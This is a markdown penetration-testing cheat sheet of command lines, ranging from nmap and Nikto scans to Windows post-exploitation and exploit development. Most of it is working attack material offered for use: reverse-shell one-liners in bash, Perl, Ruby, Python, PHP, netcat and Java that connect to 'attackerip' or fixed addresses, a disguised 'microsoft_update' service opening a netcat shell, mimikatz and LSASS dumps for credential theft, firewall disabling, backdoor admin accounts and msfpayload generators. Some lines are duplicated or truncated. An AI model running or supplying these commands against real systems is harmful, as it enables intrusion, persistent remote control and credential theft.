Useful Pentest Commands.md

Nmap Full Web Vulnerable Scan:

mkdir /usr/share/nmap/scripts/vulscan

cd /usr/share/nmap/scripts/vulscan

wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz

nmap -sS -sV –script=vulscan/vulscan.nse target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target

nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target

nmap -sV –script=vuln target

nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target

Dirb Directory Bruteforce:

dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt

Nikto Scanner:

nikto -C all -h http://IP

WordPress Scanner:

wpscan –url http://IP/ –enumerate p

Uniscan Scanning:

uniscan.pl -u target -qweds

HTTP Enumeration:

httprint -h http://www.example.com -s signatures.txt

SKIP Fish Scanner:

skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP

Uniscan Scanning:

uniscan –u http://www.hubbardbrook.org –qweds

-q – Enable Directory checks

-w – Enable File Checks

-e – Enable robots.txt and sitemap.xml check

-d – Enable Dynamic checks

-s – Enable Static checks

Skipfish Scanning:

m-time threads -LVY donot update after result

skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP

Nmap Ports Scan:

1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)

2)fargement

3)data packed – like orginal one not scan packet

4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target

5. nmap –source-port 53 target

nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)

nmap -Pn -T2 -sV –randomize-hosts IP1,IP2

nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)

nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)

nmap -sA -PN -sN target

nmap -sS -sV -T5 -F -A -O target (version detection)

nmap -sU -v target (Udp)

nmap -sU -P0 (Udp)

nmap -sC 192.168.31.10-12 (all scan default)

Netcat Scanning:

nc -v -w 1 target -z 1-1000

for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done

US Scanning:

us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535

Unicornscan Scanning:

unicornscan X.X.X.X:a -r10000 -v

Kernel Scanning:

xprobe2 -v -p tcp:80:open 192.168.6.66

Samba Enumeartion:

nmblookup -A target

smbclient //MOUNT/share -I target -N

rpcclient -U “” target

enum4linux target

SNMP ENumeration:

snmpget -v 1 -c public IP version

snmpwalk -v 1 -c public IP

snmpbulkwalk -v 2 -c public IP

Windows Useful commands:

net localgroup Users

net localgroup Administrators

search dir/s *.doc

system(“start cmd.exe /k $cmd”)

sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore

/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779

mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits

C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits

Plink Tunnel:

plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X

Enable RDP Access:

reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0

netsh firewall set service remoteadmin enable

netsh firewall set service remotedesktop enable

Turn Off Firewall:

netsh firewall set opmode disable

Meterpreter:

run getgui -u admin -p 1234

run vnc -p 5043

Add User Windows:

net user test 1234 /add

net localgroup administrators test /add

Mimikatz:

privilege::debug

sekurlsa::logonPasswords full

Passing the Hash:

pth-winexe -U hash //IP cmd

Password Cracking using Hashcat:

hashcat -m 400 -a 0 hash /root/rockyou.txt

Netcat commands:

c:> nc -l -p 31337

#nc 192.168.0.10 31337

c:> nc -v -w 30 -p 31337 -l < secret.txt

#nc -v -w 2 192.168.0.10 31337 > secret.txt

Banner Grabbing:

nc 192.168.0.10 80

GET / HTTP/1.1

Host: 192.168.0.10

User-Agent: SPOOFED-BROWSER

Referrer: K0NSP1RACY.COM

window reverse shell:

c:>nc -Lp 31337 -vv -e cmd.exe

nc 192.168.0.10 31337

c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe

nc -lp 80

#nc -lp 31337 -e /bin/bash

nc 192.168.0.11 31337

nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000

Find all SUID root files:

find / -user root -perm -4000 -print

Find all SGID root files:

find / -group root -perm -2000 -print

Find all SUID and SGID files owned by anyone:

find / -perm -4000 -o -perm -2000 -print

Find all files that are not owned by any user:

find / -nouser -print

Find all files that are not owned by any group:

find / -nogroup -print

Find all symlinks and what they point to:

find / -type l -ls

Python:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

python -m SimpleHTTPServer (Starting HTTP Server)

PID:

fuser -nv tcp 80 (list PID of process)

fuser -k -n tcp 80 (Kill Process of PID)

Hydra:

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)

Mount Remote Windows Share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Compiling Exploit in Kali:

gcc -m32 -o output32 hello.c (32 bit)

gcc -o output hello.c (64 bit)

Compiling Windows Exploits on Kali:

cd /root/.wine/drive_c/MinGW/bin

wine gcc -o ability.exe /tmp/exploit.c -lwsock32

wine ability.exe

NASM Command:

nasm -f bin -o payload.bin payload.asm

nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload

SSH Pivoting:

ssh -D 127.0.0.1:1080 -p 22 user@IP

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains commands target

Pivoting to One Network to Another:

ssh -D 127.0.0.1:1080 -p 22 user1@IP1

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

Add socks4 127.0.0.1 1081 in /etc/proxychains.conf

proxychains commands target

Pivoting Using metasploit:

route add 10.1.1.0 255.255.255.0 1

route add 10.2.2.0 255.255.255.0 1

use auxiliary/server/socks4a

run

proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

Exploit-DB search using CSV File:

searchsploit-rb –update

searchsploit-rb -t webapps -s WEBAPP

searchsploit-rb –search=”Linux Kernel”

searchsploit-rb -a “author name” -s “exploit name”

searchsploit-rb -t remote -s “exploit name”

searchsploit-rb -p linux -t local -s “exploit name”

For Privilege Escalation Exploit search:

cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3

Metasploit Payloads:

msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe

msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php

msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c

Create a Linux Reverse Meterpreter Binary

msfpayload linux/x86/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t elf -o shell

Create Reverse Shell (Shellcode)

msfpayload windows/shell_reverse_tcp LHOST= LPORT= R | msfencode -b “\x00\x0a\x0d”

Create a Reverse Shell Python Script

msfpayload cmd/unix/reverse_python LHOST= LPORT= R > shell.py

Create a Reverse ASP Shell

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t asp -o shell.asp

Create a Reverse Bash Shell

msfpayload cmd/unix/reverse_bash LHOST= LPORT= R > shell.sh

Create a Reverse PHP Shell

msfpayload php/meterpreter_reverse_tcp LHOST= LPORT= R > shell.php

Edit shell.php in a text editor to add <?php at the beginning.

Create a Windows Reverse Meterpreter Binary

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= X >shell.exe

Security Commands In Linux:

find programs with a set uid bit

find / -uid 0 -perm -4000

find things that are world writable

find / -perm -o=w

find names with dots and spaces, there shouldn’t be any

find / -name ” ” -print find / -name “..” -print find / -name “. ” -print find / -name ” ” -print

find files that are not owned by anyone

find / -nouser

look for files that are unlinked

lsof +L1

get information about procceses with open ports

lsof -i

look for weird things in arp

arp -a

look at all accounts including AD

getent passwd

look at all groups and membership including AD

getent group

list crontabs for all users including AD

for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done

generate random passwords

cat /dev/urandom| tr -dc ‘a-zA-Z0-9-!@#$%^&*()+{}|:<>?=’|fold -w 12| head -n 4

find all immutable files, there should not be any

find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’

fix immutable files

chattr -i file

Windows Buffer Overflow Exploitation Commands:

msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c

COMMONLY USED BAD CHARACTERS:

\x00\x0a\x0d\x20 For http request \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)

Useful Commands:

pattern create

pattern offset (EIP Address)

pattern offset (ESP Address)

add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )

!pvefindaddr pattern_create 5000

!pvefindaddr suggest

!pvefindaddr modules

!pvefindaddr nosafeseh

!mona config -set workingfolder C:\Mona%p

!mona config -get workingfolder

!mona mod

!mona bytearray -b “\x00\x0a”

!mona pc 5000

!mona po EIP

!mona suggest

SEH:

!mona suggest

!mona nosafeseh

nseh=”\xeb\x06\x90\x90″ (next seh chain)

iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)

ROP (DEP):

!mona modules

!mona ropfunc -m *.dll -cpb “\x00\x09\x0a’

!mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)

ASLR:

!mona noaslr

EGG Hunter:

!mona jmp -r esp

!mona egg -t lxxl

\xeb\xc4 (jump backward -60)

buff=lxxllxxl+shell

!mona egg -t ‘w00t’

GDB Debugger Commands:

Setting Breakpoint :

break *_start

Execute Next Instruction :

next

step

n

s

Continue Execution :

continue

c

Data :

checking ‘REGISTERS’ and ‘MEMORY’

Display Register Values : (Decimal , Binary , Hex )

print /d –> Decimal

print /t –> Binary

print /x –> Hex

O/P :

(gdb) print /d $eax

$17 = 13

(gdb) print /t $eax

$18 = 1101

(gdb) print /x $eax

$19 = 0xd

(gdb)

Display values of specific memory locations :

command : x/nyz (Examine)

n –> Number of fields to display ==>

y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)

z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)

Cheat Codes:

Reverse Shellcode:

BASH:

bash -i >& /dev/tcp/192.168.23.10/443 0>&1

exec /bin/bash 0&0 2>&0

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done

exec 5<>/dev/tcp/attackerip/4444

cat <&5 | while read line; do $line 2>&5 >&5; done # or:

while read line 0<&5; do $line 2>&5 >&5; done

/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1

/bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1

PERL:

Shorter Perl reverse shell that does not depend on /bin/sh:

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

If the target system is running Windows use the following one-liner:

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

RUBY:

Longer Ruby reverse shell that does not depend on /bin/sh:

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

If the target system is running Windows use the following one-liner:

ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

PYTHON:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

PHP:

This code assumes that the TCP connection uses file descriptor 3.

php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’

php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’

If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK

NETCAT:

Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:

nc -e /bin/sh attackerip 4444

nc -e /bin/sh 192.168.37.10 443

If the -e option is disabled, try this

mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe

mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe

/bin/sh | nc attackerip 4444

/bin/sh | nc 192.168.23.10 443

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/

rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/

If you have the wrong version of netcat installed, try

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

TELNET:

If netcat is not available or /dev/tcp

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

XTERM:

Xterm is the best..

To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do this is with Xnest: It is available on Ubuntu.

Xnest :1 # Note: The command starts with uppercase X

Xnest :1 # Note: The command starts with uppercase X

Then remember to authorise on your system the target IP to connect to you: xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server

xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server

If you want anyone to connect to this spawned xterm try: xhost + # Run this INSIDE the spawned xterm on the open X Server xhost + # Run this INSIDE the spawned xterm on the open X Server

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system: xterm -display attackerip:1 xterm -display attackerip:1

Or: $ DISPLAY=attackerip:0 xterm $ DISPLAY=attackerip:0 xterm

It will try to connect back to you, attackerip, on TCP port 6001. Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:

/usr/openwin/bin/xterm -display attackerip:1 /usr/openwin/bin/xterm -display attackerip:1

PHP:

php -r ‘$sock=fsockopen(“192.168.0.100″,4444);exec(“/bin/sh -i <&3 >&3 2>&3″);’

JAVA:

r = Runtime.getRuntime() p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do $line 2>&5 >&5; done”] as String[]) p.waitFor()